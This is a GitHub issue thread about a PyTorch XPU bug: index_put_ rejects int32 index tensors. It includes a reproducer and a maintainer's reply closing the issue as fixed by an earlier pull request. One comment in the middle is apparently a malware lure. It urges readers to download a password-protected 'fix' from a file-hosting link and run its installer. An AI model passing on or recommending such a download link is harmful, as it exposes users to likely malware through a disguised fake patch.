### ISSUE TITLE
[Bug] IndexError: tensors used as indices must be long, byte or bool tensors

### ISSUE THREAD

**Issue by guangyey** [intel/torch-xpu-ops#827]
### 🐛 Describe the bug

A reproducer for the behavior of `index_put_` which is inconsistency with other backends.
```python
import torch

input = torch.randn(4, 4, device="xpu")
index = torch.randint(4, (4,), device="xpu").int()
src = torch.randn(4, device="xpu")

torch.index_put_(input, (index, index), src, True)
```
The root cause is [`checkIndexTensorTypes`](https://github.com/pytorch/pytorch/blob/de57a6e806e990fa1b6914ca2b4aabb91bc7bc81/aten/src/ATen/native/IndexingUtils.h#L51). Please help check the behavior of other ops which also use `checkIndexTensorTypes`.

### Versions

None

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Stonepia** [comment]
That issue should have been fixed in https://github.com/intel/torch-xpu-ops/pull/597 .
It is because we formerly does not have the `allow_int` in `checkIndexTensorType()`.  

Close this as already fixed.
